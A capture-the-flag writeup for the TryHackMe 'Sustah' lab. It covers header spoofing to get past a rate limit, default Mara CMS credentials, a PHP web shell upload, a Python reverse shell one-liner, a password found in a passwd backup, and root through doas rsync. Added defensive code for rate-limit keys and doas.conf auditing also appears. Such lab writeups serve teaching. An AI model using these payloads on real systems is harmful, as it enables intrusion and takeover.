Sustah tryhackme Writeup (Medium)
Enumeration (NMAP, Services)
nmap -sC -sV 10.10.153.95
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-16 19:29 EDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 19:30 (0:00:12 remaining)
Nmap scan report for 10.10.153.95
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bd:a4:a3:ae:66:68:1d:74:e1:c0:6a:eb:2b:9b:f3:33 (RSA)
| 256 9a:db:73:79:0c:72:be:05:1a:86:73:dc:ac:6d:7a:ef (ECDSA)
|_ 256 64:8d:5c:79:de:e1:f7:3f:08:7c:eb:b7:b3:24:64:1f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Susta
8085/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Spinner
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.43 seconds
As we can see, three ports are currently open. Let's review the services running on them.
22 is running OpenSSH 7.2p2
80 is running Apache HTTPD
8085 is running Gunicorn Python web server
Gunicorn web server enumeration
Navigating to http://10.10.153.95:8085/ we see the following.
It seems we have to guess a number: a correct guess gives some sort of "reward" output, and a wrong guess gives an error.
I intercepted the request using Burp Suite and sent it to Intruder so we can brute-force this number.
After configuring Intruder as shown above, click Start attack.
Bypassing rate limiting
There seems to be a rate limit; we have to bypass it or we cannot brute-force the lucky number. We can try some common headers that rate limiters often trust for the client address, e.g.
X-Forwarded-For, X-Forwarded-IP, X-Forwarded-Host
I am going to do this in Python. We will use the requests module so we can set headers and try to bypass the rate limit.
import requests
import sys

url = "http://10.10.252.25:8085/"

for i in range(100000):
    # Headers that rate limiters commonly trust for the client address;
    # setting all of them to 127.0.0.1 is the bypass attempt.
    headers = {
        "X-Remote-IP": "127.0.0.1",
        "X-Remote-Addr": "127.0.0.1",
        "X-Forwarded-For": "127.0.0.1",
        "X-Forwarded-IP": "127.0.0.1",
        "X-Host": "127.0.0.1",
        "X-Forwarded-Host": "127.0.0.1",
    }
    obj = {"number": i}
    req = requests.post(url, data=obj, headers=headers)
    # Any response other than the failure message means the guess was right.
    if "Oh no! How unlucky. Spin the wheel and try again." not in req.text:
        print("{} is the lucky number!".format(i))
        sys.exit()
I know it's messy; I didn't use any kind of IDE and I wrote it quite early in the morning.
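The reason those headers work is that the limiter keys on a client-supplied address rather than on the TCP peer. As an added defensive example (not from the writeup), here is how a limiter should derive its key: honour X-Forwarded-For only when the request comes from a configured proxy, otherwise use the peer. The proxy range, the fixed-window limiter and the simulate() helper are constructed for this example.

```python
from ipaddress import ip_address, ip_network

# Proxies whose X-Forwarded-For we trust (constructed for this example).
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]

# Headers the spinner app apparently honours; any client can set them.
SPOOFABLE = ("X-Forwarded-For", "X-Forwarded-IP", "X-Forwarded-Host",
             "X-Remote-IP", "X-Remote-Addr", "X-Host")

def naive_key(remote_addr, headers):
    """The bypassable scheme: trust X-Forwarded-For from anyone."""
    return headers.get("X-Forwarded-For") or remote_addr

def client_key(remote_addr, headers):
    """Key on the TCP peer unless it is a trusted proxy; then take the
    last X-Forwarded-For hop, i.e. the one that proxy appended itself."""
    peer = ip_address(remote_addr)
    if any(peer in net for net in TRUSTED_PROXIES):
        xff = headers.get("X-Forwarded-For", "")
        hop = xff.split(",")[-1].strip()
        try:
            return str(ip_address(hop))
        except ValueError:
            pass                     # garbage header: fall back to the peer
    return remote_addr

class FixedWindowLimiter:
    """Allow `limit` requests per key within each `window` seconds."""
    def __init__(self, limit, window):
        self.limit, self.window, self.hits = limit, window, {}

    def allow(self, key, now):
        start, count = self.hits.get(key, (now, 0))
        if now - start >= self.window:
            start, count = now, 0
        self.hits[key] = (start, count + 1)
        return count + 1 <= self.limit

def simulate(attempts, limiter, key_fn, peer="198.51.100.7"):
    """One peer sends `attempts` guesses, rotating the spoofed headers each
    time as the script above does; returns how many the limiter lets through."""
    allowed = 0
    for i in range(attempts):
        fake = f"127.0.0.{i % 250 + 1}"
        headers = {h: fake for h in SPOOFABLE}
        if limiter.allow(key_fn(peer, headers), now=0.0):
            allowed += 1
    return allowed
```

With naive_key every spoofed address gets a fresh bucket and all 100 guesses pass; with client_key the untrusted peer is capped at the limit.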
Now that we have the code, let's enter it into the "Input" text box. We are given a path.
I tried going to the path on this port but got an error, so let's try it on the Apache HTTP server instead.
Apache HTTP Enumeration
Navigate to 10.10.153.95/YouGotTh3P@th. This is running Mara CMS, so we can try logging in with default credentials. Navigate to the following URL: 10.10.153.95/YouGotTh3P@th/?login
Username:admin
password:changeme
The default credentials worked and we are logged in as an administrator.
Googling "MaraCMS", we find an RCE on Exploit-DB.
Read exploit-db.com/exploits/48780, which explains in detail how the RCE works. It's pretty basic: first go to /YouGotTh3P@th/codebase/dir.php?type=filenew, then create a PHP file called shell.php and add the following code to it.
<?php system($_GET["cmd"]); ?>
Now we need to upload this file onto the server.
curl -X POST 10.10.153.95/YouGotTh3P@th/img/shell.php?cm..
Or navigate to the following URL
Now that we have RCE, let's get a reverse shell on the box.
- 10.10.153.95/YouGotTh3P@th/img/shell.php?cm.. -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",$PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
After some time enumerating, I checked the /opt directory, which contained nothing. We couldn't get the user flag, as it was owned by Kiran and not readable by us, so I continued on to /var/backups.
cd /var/backups
ls -al
total 636
drwxr-xr-x 2 root root 4096 Dec 9 2020 .
drwxr-xr-x 14 root root 4096 Dec 6 2020 ..
-r--r--r-- 1 root root 1722 Dec 6 2020 .bak.passwd
-rw-r--r-- 1 root root 51200 Dec 6 2020 alternatives.tar.0
-rw-r--r-- 1 root root 6308 Dec 9 2020 apt.extended_states.0
-rw-r--r-- 1 root root 715 Dec 6 2020 apt.extended_states.1.gz
-rw-r--r-- 1 root root 509 Nov 12 2020 dpkg.diversions.0
-rw-r--r-- 1 root root 207 Dec 6 2020 dpkg.statoverride.0
-rw-r--r-- 1 root root 547201 Dec 6 2020 dpkg.status.0
-rw------- 1 root root 849 Dec 6 2020 group.bak
-rw------- 1 root shadow 714 Dec 6 2020 gshadow.bak
-rw------- 1 root root 1695 Dec 6 2020 passwd.bak
-rw------- 1 root shadow 1031 Dec 6 2020 shadow.bak
As we can see, we are able to read ".bak.passwd", while the real backup "passwd.bak" is root-only. I thought this was suspicious and decided to cat the file's contents.
- cat .bak.passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
kiran:x:1002:1002:trythispasswordforuserkiran:/home/kiran:
Possible credentials below
Username:Kiran
Password:trythispasswordforuserkiran
That worked! Ez pwn
I navigated to /home/kiran and read the "user.txt"
Now I am going to get linpeas.sh onto the box; it is an easy way to enumerate for priv esc.
Awesome!
Inside the "doas" configuration file we see that we can run the "rsync" binary as root with no password. This is a possible priv esc: rsync's -e option names the "remote shell" program it will execute, so a rule permitting rsync as root effectively permits running any command as root.
- doas rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
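An added check, not part of the original writeup: a small auditor for doas.conf that flags nopass rules granting root either any command or a command such as rsync that can execute another program. OPTIONS, SHELL_CAPABLE and SAMPLE_CONF are constructed assumptions modelled on the rule reported on this box.

```python
import shlex

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}
# Tools whose arguments name another program to run; rsync is this box's case.
SHELL_CAPABLE = {"rsync", "sh", "bash"}

def parse_rule(line):
    """Parse one doas.conf line into a dict; None for blank/comment lines."""
    toks = shlex.split(line, comments=True)
    if len(toks) < 2:
        return None
    rest = toks[1:]
    rule = {"action": toks[0], "opts": set(), "target": "root",
            "cmd": None, "args": None}
    while rest and (rest[0] in OPTIONS or rest[0] == "setenv"):
        opt = rest.pop(0)
        if opt == "setenv":                  # skip the "{ VAR=value ... }" block
            while rest and rest.pop(0) != "}":
                pass
        else:
            rule["opts"].add(opt)
    rule["identity"] = rest.pop(0)
    if rest[:1] == ["as"]:
        rule["target"], rest = rest[1], rest[2:]
    if rest[:1] == ["cmd"]:
        rule["cmd"], tail = rest[1], rest[2:]
        rule["args"] = tail[1:] if tail[:1] == ["args"] else None
    return rule

def audit(conf_text):
    """(line_no, identity, reason) for nopass root rules that amount to a root shell."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        r = parse_rule(line)
        if (not r or r["action"] != "permit" or "nopass" not in r["opts"]
                or r["target"] != "root"):
            continue
        if r["cmd"] is None:
            findings.append((n, r["identity"], "any command as root without a password"))
        elif r["cmd"].rsplit("/", 1)[-1] in SHELL_CAPABLE:
            findings.append((n, r["identity"], f"{r['cmd']} can execute arbitrary commands"))
    return findings

# Constructed doas.conf for this example, modelled on the rule found on the box.
SAMPLE_CONF = """\
permit persist vagrant as root
permit nopass kiran as root cmd rsync
permit nopass setenv { PATH=/usr/bin } ubuntu as root cmd systemctl args status sshd
permit nopass ubuntu
"""
```

Running audit(SAMPLE_CONF) flags the kiran rsync rule and the unrestricted ubuntu rule, and leaves the password-protected and argument-pinned rules alone.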
Done. We've rooted the machine, it was a fun one! I hope you've enjoyed and learned something today.